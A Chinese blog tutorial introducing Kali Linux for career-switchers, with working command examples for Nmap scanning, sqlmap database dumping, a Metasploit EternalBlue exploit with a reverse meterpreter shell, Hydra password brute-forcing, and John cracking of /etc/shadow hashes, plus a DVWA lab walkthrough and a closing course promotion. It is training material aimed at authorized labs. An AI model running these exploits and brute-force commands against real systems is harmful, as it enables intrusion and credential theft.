企业网站备案好不好找人做软件网站

企业网站备案好不好,找人做软件网站,建设银行企业网银网站打不开,有没有找外加工的活的平台Kali Linux 入门#xff1a;转行网络安全必学的渗透测试系统#xff08;常用命令详解#xff09; 引言 我转行面试渗透测试岗位时#xff0c;面试官问 “你用过 Kali Linux 吗#xff1f;会用里面的 Nmap、Sqlmap 吗#xff1f;”—— 当时我只在 Windows 上用过 Sqlmap…Kali Linux 入门转行网络安全必学的渗透测试系统常用命令详解引言我转行面试渗透测试岗位时面试官问 “你用过 Kali Linux 吗会用里面的 Nmap、Sqlmap 吗”—— 当时我只在 Windows 上用过 Sqlmap没接触过 Kali直接没通过。后来才知道Kali Linux 是 “渗透测试专用系统”里面预装了 800 安全工具Nmap、Burp Suite、Sqlmap 等90% 的渗透测试岗位要求 “会用 Kali”。本文从 “安装” 到 “常用命令”帮零基础快速上手 Kali。一、先搞懂Kali Linux 是什么为什么必须学1. Kali Linux 的 “身份”Kali Linux 是基于 Debian 的 Linux 操作系统专门为 “渗透测试、漏洞评估、网络安全” 设计 —— 简单说它是 “安全工程师的工具箱”打开就能用各种安全工具不用自己一个个安装Windows 装工具要配置环境很麻烦。2. 为什么必须学3 个核心原因工具全预装 800 安全工具覆盖 “信息收集、漏洞利用、流量分析、密码破解” 等所有渗透场景如 Nmap、Burp Suite、Sqlmap、Metasploit岗位刚需渗透测试、Web 安全岗位面试 100% 会问 “你用 Kali 做过什么实战”不会 Kali 基本找不到这类工作兼容性好很多安全工具如 Metasploit 框架只支持 Linux在 Windows 上用不了或容易出错Kali 能完美运行。二、第一步安装 Kali Linux零基础推荐虚拟机安装不建议直接在电脑上装会覆盖原系统推荐用 VMware 装虚拟机安全、方便不用改电脑设置1. 准备工具3 个全免费VMware Workstation Player虚拟机软件官网可下免费版Kali Linux 镜像文件官网下载选 “64-bit”文件格式是.iso至少 8G 内存、50G 硬盘空间Kali 运行需要内存不够会很卡。2. 安装步骤图文简化版零基础能看懂打开 VMware点击 “创建新的虚拟机”选 “典型”下一步选 “安装程序光盘映像文件iso”点击 “浏览”选择下载的 Kali 镜像下一步填写 “客户机操作系统”选 “Linux”版本选 “Debian 11.x 64 位”下一步虚拟机名称填 “Kali Linux”位置选 “D 盘 / Kali”别放 C 盘占空间下一步磁盘大小选 “50GB”选 “将虚拟磁盘存储为单个文件”下一步点击 “自定义硬件”内存调为 “4GB”至少 2GB越大越流畅处理器调为 “2 核”点击 “完成”点击 “开启此虚拟机”进入 Kali 安装界面选 “Graphical install”图形化安装简单语言选 “中文简体”地区选 “中国”键盘选 “汉语”下一步等待 “加载组件”然后设置 “主机名”如 kali、“域名”不用填留空下一步设置 “root 密码”重要记好登录要用下一步磁盘分区选 “使用整个磁盘”下一步选 “将所有文件放在一个分区中”简单适合零基础下一步选 “结束分区设定并将修改写入磁盘”选 “是”等待安装约 20 分钟看电脑速度安装完成后重启虚拟机用 root 账号和刚才设的密码登录桌面版和 Windows 一样有图标很直观。3. 入门设置2 个必做否则工具用不了更新软件源Kali 默认源在国外更新慢换国内源打开终端点击桌面 “终端” 图标执行命令vim /etc/apt/sources.list按 “i” 进入编辑模式删除原有内容粘贴国内源推荐阿里云源deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib按 “Esc”输入 “:wq” 保存退出执行命令apt update apt upgrade -y更新软件约 10-30 分钟耐心等。安装中文输入法默认只有英文输入中文方便执行命令apt install fcitx fcitx-googlepinyin -y重启虚拟机右下角会出现输入法图标按 “CtrlSpace” 切换中英文。三、第二步Kali 常用工具命令按渗透流程分 4 类附示例Kali 的工具按 “渗透测试流程” 分 4 类信息收集、漏洞利用、密码破解、流量分析我们重点学 “入门必用” 的 10 个命令每个命令给示例照着敲就能用。1. 信息收集工具渗透第一步了解目标1Nmap端口扫描看目标开放哪些端口对应什么服务作用比如扫描目标 IP192.168.1.100看开放了 80HTTP、22SSH端口就知道目标有网页和 SSH 服务常用命令及示例命令作用示例扫描目标 IP 192.168.1.100输出说明nmap -sT 目标IPTCP 全连接扫描稳定适合入门nmap -sT 192.168.1.100会显示 “22/tcp open ssh”“80/tcp open http”表示 22、80 端口开放nmap -sV 目标IP显示服务版本知道服务是哪个版本找对应漏洞nmap -sV 192.168.1.100会显示 “22/tcp open ssh OpenSSH 7.9p1”表示 SSH 服务是 7.9 版本nmap -p 端口范围 目标IP扫描指定端口比如只扫 1-1000 端口速度快nmap -p 1-1000 192.168.1.100只扫描 1 到 1000 端口不扫其他端口2whois查询域名注册信息看目标网站是谁的在哪注册作用比如查询 “baidu.com”能看到注册商、注册时间、联系人邮箱命令示例whois baidu.com输出说明会显示 “Registrar: MarkMonitor Inc.”注册商是 MarkMonitor、“Creation Date: 1999-10-11”注册时间是 1999 年。3dig查询 DNS 记录看目标域名对应的 IP 地址作用比如查询 “baidu.com” 的 IP知道访问这个域名时实际连接的是哪个服务器命令示例dig baidu.com输出说明在 “ANSWER SECTION” 下能看到 “baidu.com. 1200 IN A 110.242.68.66”A 记录对应 IP 是 110.242.68.66。2. 漏洞利用工具渗透第二步利用漏洞入侵1Sqlmap自动化 SQL 注入找网页的 SQL 注入漏洞获取数据库数据作用比如目标网页有 “http://192.168.1.100/login.php?id1”用 Sqlmap 能自动检测是否有 SQL 注入能获取数据库名、表名、数据常用命令及示例命令作用示例目标 URLhttp://192.168.1.100/login.php?id1输出说明sqlmap -u 目标URL检测目标是否有 SQL 注入sqlmap -u http://192.168.1.100/login.php?id1会显示 “Parameter ‘id’ is vulnerable”表示 id 参数有注入漏洞sqlmap -u 目标URL -dbs获取所有数据库名sqlmap -u http://192.168.1.100/login.php?id1 -dbs会列出目标的数据库如 “mysql”“testdb”sqlmap -u 目标URL -D 数据库名 -tables获取指定数据库的表名sqlmap -u … -D testdb -tables会列出 testdb 数据库的表如 “user”“order”2Burp Suite抓包改包Web 安全核心工具找 XSS、CSRF 漏洞作用拦截浏览器和服务器之间的 HTTP/HTTPS 请求修改请求内容如改 Cookie、改参数测试漏洞入门使用步骤以抓 HTTP 包为例打开 Burp SuiteKali 桌面 “应用程序”→“Web 应用程序”→“Burp Suite Community Edition”配置浏览器代理打开 Kali 自带的 Firefox 浏览器设置→常规→网络设置→手动配置代理HTTP 代理填 “127.0.0.1”端口填 “8080”保存点击 Burp Suite 的 “Proxy”→“Intercept”确保 “Intercept is on”拦截开启在浏览器访问 “http://192.168.1.100/login.php”输入账号密码点击登录 ——Burp 会拦截到登录请求查看请求内容在 Burp 的 “Raw” 标签能看到完整的 HTTP 请求请求行、请求头、请求体可修改参数如把密码改成 “123456”点击 “Forward” 发送请求。3Metasploit漏洞利用框架攻击服务器、系统获取权限作用比如目标服务器有 “永恒之蓝” 漏洞Windows 漏洞用 Metasploit 能一键攻击获取服务器控制权入门命令及示例攻击永恒之蓝漏洞打开 Metasploit终端执行msfconsole会进入 Metasploit 界面等待加载完成搜索永恒之蓝模块search ms17-010ms17-010 是永恒之蓝漏洞编号输出会显示 “exploit/windows/smb/ms17_010_eternalblue” 模块使用攻击模块use exploit/windows/smb/ms17_010_eternalblue终端会提示 “[*] Using configured payload windows/x64/meterpreter/reverse_tcp”默认 payload用于获取远程控制会话设置目标 IPset RHOSTS 192.168.1.101替换为目标 Windows 服务器 IP设置本地 IP用于接收会话set LHOST 192.168.1.100替换为你的 Kali 机器 IP用ifconfig命令可查执行攻击run或exploit成功后会获取 “meterpreter 会话”输入shell可进入目标服务器的 CMD 命令行如输入ipconfig能查看目标服务器 IP输入dir能看文件列表注意仅在授权的测试环境中使用如自己搭建的 Windows 虚拟机禁止攻击他人系统。3. 密码破解工具渗透第三步破解账号密码1Hydra暴力破解破解 SSH、FTP、登录页面等密码作用通过 “字典”包含大量可能密码的文件尝试登录适合破解弱密码如 admin/123456常用命令及示例命令作用示例破解 SSH 密码目标 IP192.168.1.100用户名root输出说明hydra -l 用户名 -P 字典路径 目标IP 服务类型单用户名 字典破解hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh若破解成功会显示 “[22][ssh] host: 192.168.1.100 login: root password: 123456”hydra -L 用户名字典 -P 密码字典 目标IP http-post-form破解网页登录POST 请求hydra -L user.txt -P pass.txt 192.168.1.100 http-post-form “/login.php:usernameUSERpasswordPASS:Login failed”“/login.php” 是登录页面路径“Login failed” 是登录失败提示用于判断是否成功字典路径Kali 自带字典在/usr/share/wordlists/目录常用rockyou.txt需解压gunzip rockyou.txt.gz。2John the Ripper哈希密码破解破解存储在文件中的加密密码如 Linux /etc/shadow 文件作用比如获取到 Linux 服务器的/etc/shadow文件包含用户哈希密码用 John 能破解出明文密码常用命令及示例准备哈希文件将/etc/shadow文件复制到 Kali假设保存为shadow.txt执行破解john shadow.txt默认用自带字典查看破解结果john --show shadow.txt若成功会显示 “root:123456:18987:0:99999:7:::”root 用户密码是 123456进阶用自定义字典破解john --wordlist/usr/share/wordlists/rockyou.txt shadow.txt。4. 流量分析工具渗透第四步分析网络流量找攻击痕迹1Wireshark图形化流量分析抓包、分析异常流量作用比如服务器被攻击后用 Wireshark 打开当时的流量包能看到黑客的 IP、攻击行为如 SQL 注入请求入门使用步骤分析 SQL 注入流量打开 WiresharkKali 桌面 “应用程序”→“网络分析”→“Wireshark”选择网卡点击 “eth0” 或 “wlan0”根据你的网络选择开始抓包设置过滤条件在过滤框输入 “http and ip.addr 192.168.1.100”只看目标 IP 192.168.1.100 的 HTTP 流量触发攻击在另一台机器对 192.168.1.100 做 SQL 注入如输入admin’ or ‘1’1登录分析流量在 Wireshark 中找到 “POST /login.php” 的请求包右键 “追踪流”→“TCP 流”能看到请求体中的usernameadmin%27or%271%27%3D%271URL 编码后的 SQL 注入语句确认存在攻击。2Tcpdump命令行流量抓包无图形界面时用如远程服务器作用在没有桌面的 Linux 服务器上用 Tcpdump 抓包保存为文件后再用 Wireshark 分析常用命令及示例命令作用示例输出说明tcpdump -i 网卡 -w 保存文件抓包并保存到文件tcpdump -i eth0 -w traffic.pcap会在当前目录生成traffic.pcap文件按CtrlC停止抓包tcpdump -i 网卡 host 目标IP只抓目标 IP 的流量tcpdump -i eth0 host 192.168.1.100实时显示 192.168.1.100 的所有流量如 “IP 192.168.1.100.80 192.168.1.101.54321: Flags [P.], seq 123:456, ack 789, win 502, length 333”四、实战案例用 Kali 做一次简单 Web 渗透测试零基础可操作目标在 DVWA 靶场本地搭建完成 “SQL 注入→获取数据库数据→破解管理员密码” 全流程步骤 1搭建 DVWA 靶场已搭建可跳过在 Kali 中打开终端执行docker pull citizenstig/dvwa用 Docker 快速部署无需手动装环境启动 DVWAdocker run -d -p 8080:80 citizenstig/dvwa将靶场映射到 Kali 的 8080 端口访问靶场打开 Kali 浏览器输入http://127.0.0.1:8080默认账号admin密码password登录后进入 DVWA 界面。步骤 2用 Nmap 扫描靶场端口执行nmap -sV 127.0.0.1 -p 8080输出会显示 “8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))”确认靶场正常运行。步骤 3用 Sqlmap 做 SQL 注入获取数据库数据在 DVWA 中设置安全级别为 “Low”左侧 “DVWA Security”→“Security Level” 选 “Low”→“Submit”进入 “SQL Injection” 模块浏览器地址栏会显示http://127.0.0.1:8080/vulnerabilities/sqli/?id1SubmitSubmit#在 Kali 终端执行sqlmap -u “http://127.0.0.1:8080/vulnerabilities/sqli/?id1SubmitSubmit#” --cookie“securitylow; PHPSESSID你的PHPSESSID”PHPSESSID 从浏览器 Cookie 中获取按 F12→“应用”→“Cookie” 查看按提示输入 “Y” 确认Sqlmap 会检测出 “id” 参数存在 SQL 注入执行sqlmap -u … --dbs获取数据库列表会看到 “dvwa” 数据库执行sqlmap -u … -D dvwa -tables获取 “dvwa” 数据库的表会看到 “users” 表执行sqlmap -u … -D dvwa -T users -columns获取 “users” 表的列会看到 “user”用户名和 “password”哈希密码列执行sqlmap -u … -D dvwa -T users -C user,password --dump导出用户名和哈希密码会看到 “admin” 对应的密码哈希 “5f4dcc3b5aa765d61d8327deb882cf99”。步骤 4用 John the Ripper 破解哈希密码将哈希密码保存到文件echo “admin:5f4dcc3b5aa765d61d8327deb882cf99” hash.txt执行破解john --wordlist/usr/share/wordlists/rockyou.txt hash.txt查看结果john --show hash.txt会显示 “admin:password”破解出 admin 用户的明文密码是 password。步骤 5验证结果用 “admin/password” 登录 DVWA确认登录成功完成渗透测试流程。五、Kali Linux 学习总结与转行应用1. 学习重点零基础别贪多优先掌握Nmap信息收集、SqlmapSQL 注入、Burp Suite抓包这 3 个工具能应对 80% 的入门级渗透场景避免误区别盲目学 “所有工具”先把 1 个工具用熟如用 1 周时间练会 Sqlmap 的 5 个常用命令比学 10 个工具却不会用更有用。2. 转行简历写法突出 Kali 实战经验技能栏“熟练使用 Kali Linux会用 Nmap 做端口扫描、Sqlmap 做 SQL 注入、Burp Suite 抓包分析能独立完成 DVWA 靶场渗透测试”项目经验“使用 Kali Linux 对 DVWA 靶场进行 Web 渗透测试通过 Sqlmap 获取 dvwa 数据库的 users 表数据用 John the Ripper 破解 admin 用户密码生成渗透测试报告”。3. 面试回答举例被问 “你用 Kali 做过什么实战”“我用 Kali 完成过 DVWA 靶场的全流程渗透首先用 Nmap 扫描靶场端口确认 8080 端口开放且运行 Apache 服务然后在 DVWA 的 SQL Injection 模块用 Sqlmap 检测出 id 参数存在注入导出了 dvwa 数据库中 users 表的用户名和哈希密码最后用 John the Ripper 破解出 admin 用户的明文密码整个过程用到了 Nmap、Sqlmap、John 这 3 个 Kali 自带工具还生成了详细的渗透报告。”总结Kali Linux 的核心是 “工具 实战”零基础不用背所有命令先练会 “信息收集→漏洞利用→密码破解” 的基础流程再逐步学进阶工具。建议每天用 1 小时实操如练 1 个 Sqlmap 命令、做 1 次简单渗透1 个月就能熟练上手应对入门级渗透测试岗位需求。评论区说说你在 Kali 使用中遇到的问题帮你解决网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失